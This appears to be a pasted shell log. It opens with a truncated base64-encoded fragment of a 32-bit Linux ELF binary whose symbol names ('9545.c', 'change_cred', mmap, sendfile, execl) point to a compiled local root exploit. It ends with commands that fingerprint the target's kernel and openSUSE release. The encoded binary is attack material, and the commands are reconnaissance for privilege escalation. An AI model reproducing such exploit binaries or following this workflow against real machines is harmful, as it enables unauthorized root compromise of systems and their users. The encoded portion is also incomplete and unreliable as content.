AAAAAAD0nwQIAAAAAAMAFwAAAAAAOKAECAAAAAADABgAAAAAAESgBAgAAAAAAwAZAAAAAAAAAAAA
AAAAAAMAGgAAAAAAAAAAAAAAAAADABsAAAAAAAAAAAAAAAAAAwAcAAAAAAAAAAAAAAAAAAMAHQAA
AAAAAAAAAAAAAAADAB4AAAAAAAAAAAAAAAAAAwAfAAAAAAAAAAAAAAAAAAMAIAAAAAAAAAAAAAAA
AAADACEAAQAAAAAAAAAAAAAABADx/wwAAAAAAAAAAAAAAAQA8f8YAAAAAAAAAAAAAAAEAPH/NAAA
AAAAAAAAAAAABADx/zsAAAAAAAAAAAAAAAQA8f9GAAAAAAAAAAAAAAAEAPH/ewAAAJSFBAgAAAAA
AgANAIsAAAAAAAAAAAAAAAQA8f+WAAAAFJ8ECAAAAAABABIApAAAAByfBAgAAAAAAQATALIAAAAk
nwQIAAAAAAEAFAC/AAAARKAECAEAAAABABkAzgAAAECgBAgAAAAAAQAYANUAAADAhQQIAAAAAAIA
DQDrAAAA8IUECAAAAAACAA0AiwAAAAAAAAAAAAAABADx//cAAAAYnwQIAAAAAAEAEgAEAQAAIJ8E
CAAAAAABABMAEQEAAKSKBAgAAAAAAQAQAB8BAAAknwQIAAAAAAEAFAArAQAAEIoECAAAAAACAA0A
OwAAAAAAAAAAAAAABADx/0EBAAAAAAAAAAAAAAQA8f92AQAAAAAAAAAAAAAEAPH/fQEAABSGBAie
AQAAAgANAIkBAABIoAQIBAAAAAEAGQCNAQAATKAECAQAAAABABkAkQEAAPSfBAgAAAAAAQIXAKcB
AAAUnwQIAAAAAAACEQC4AQAAFJ8ECAAAAAAAAhEAywEAACifBAgAAAAAAQIVANQBAAAAAAAAIwAA
ABIAAADrAQAAOKAECAAAAAAgABgA9gEAAAAAAABnAAAAEgAAAAYCAACQiQQIBQAAABIADQAWAgAA
cIUECAAAAAASAA0AHQIAAAAAAABLAAAAEgAAADECAAAAAAAAAAAAACAAAABAAgAAAAAAAAAAAAAg
AAAAVAIAAFiKBAgEAAAAEQAPAFsCAAA8igQIAAAAABIADgBhAgAAAAAAAJ8BAAASAAAAfgIAAAAA
AABbAQAAEgAAAI8CAAAAAAAA0wAAABIAAAChAgAAXIoECAQAAAARAA8AsAIAADigBAgAAAAAEAAY
AL0CAAAAAAAAKwAAABIAAADQAgAAAAAAAEIAAAASAAAA4gIAAAAAAAA/AAAAEgAAAPQCAAA8oAQI
AAAAABECGAABAwAAoIkECGkAAAASAA0AEQMAAAAAAAARAAAAEgAAACMDAAAAAAAAQwAAABIAAAA4
AwAARKAECAAAAAAQAPH/RAMAAFCgBAgAAAAAEADx/0kDAABEoAQIAAAAABAA8f9QAwAAAAAAAOIA
AAASAAAAYAMAAAmKBAgAAAAAEgINAHcDAAAAAAAAEQAAABIAAACJAwAAsocECNkBAAASAA0AjgMA
AGiEBAgAAAAAEgALAABhYmktbm90ZS5TAHN1c2Utbm90ZS5TAC4uL3N5c2RlcHMvaTM4Ni9lbGYv
c3RhcnQuUwBpbml0LmMAaW5pdGZpbmkuYwAvdXNyL3NyYy9wYWNrYWdlcy9CVUlMRC9nbGliYy0y
LjUvY2MtbnB0bC9jc3UvY3J0aS5TAGNhbGxfZ21vbl9zdGFydABjcnRzdHVmZi5jAF9fQ1RPUl9M
SVNUX18AX19EVE9SX0xJU1RfXwBfX0pDUl9MSVNUX18AY29tcGxldGVkLjU3NTIAcC41NzUwAF9f
ZG9fZ2xvYmFsX2R0b3JzX2F1eABmcmFtZV9kdW1teQBfX0NUT1JfRU5EX18AX19EVE9SX0VORF9f
AF9fRlJBTUVfRU5EX18AX19KQ1JfRU5EX18AX19kb19nbG9iYWxfY3RvcnNfYXV4AC91c3Ivc3Jj
L3BhY2thZ2VzL0JVSUxEL2dsaWJjLTIuNS9jYy1ucHRsL2NzdS9jcnRuLlMAOTU0NS5jAGNoYW5n
ZV9jcmVkAHVpZABnaWQAX0dMT0JBTF9PRkZTRVRfVEFCTEVfAF9faW5pdF9hcnJheV9lbmQAX19p
bml0X2FycmF5X3N0YXJ0AF9EWU5BTUlDAGdldHBhZ2VzaXplQEBHTElCQ18yLjAAZGF0YV9zdGFy
dABtbWFwQEBHTElCQ18yLjAAX19saWJjX2NzdV9maW5pAF9zdGFydABzZW5kZmlsZUBAR0xJQkNf
Mi4xAF9fZ21vbl9zdGFydF9fAF9Kdl9SZWdpc3RlckNsYXNzZXMAX2ZwX2h3AF9maW5pAF9fbGli
Y19zdGFydF9tYWluQEBHTElCQ18yLjAAZXhlY2xAQEdMSUJDXzIuMABwZXJyb3JAQEdMSUJDXzIu
MABfSU9fc3RkaW5fdXNlZABfX2RhdGFfc3RhcnQAbWtzdGVtcEBAR0xJQkNfMi4wAHNvY2tldEBA
R0xJQkNfMi4wAHVubGlua0BAR0xJQkNfMi4wAF9fZHNvX2hhbmRsZQBfX2xpYmNfY3N1X2luaXQA
Z2V0dWlkQEBHTElCQ18yLjAAZnRydW5jYXRlQEBHTElCQ18yLjAAX19ic3Nfc3RhcnQAX2VuZABf
ZWRhdGEAZXhpdEBAR0xJQkNfMi4wAF9faTY4Ni5nZXRfcGNfdGh1bmsuYngAZ2V0Z2lkQEBHTElC
Q18yLjAAbWFpbgBfaW5pdAA=
boldi@linux-xm7e:~/h> file 9545
9545: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.6.4, dynamically linked (uses shared libs), for GNU/Linux 2.6.4, not stripped
boldi@linux-xm7e:~/h> uname -a
Linux linux-xm7e 2.6.18.2-34-default #1 SMP Mon Nov 27 11:46:27 UTC 2006 i686 i686 i386 GNU/Linux
boldi@linux-xm7e:~/h> cat /etc/su
sudoers susehelp.d/ suseRegister.conf suspend.conf
boldi@linux-xm7e:~/h> cat /etc/SuSE-release
openSUSE 10.2 (i586)
VERSION = 10.2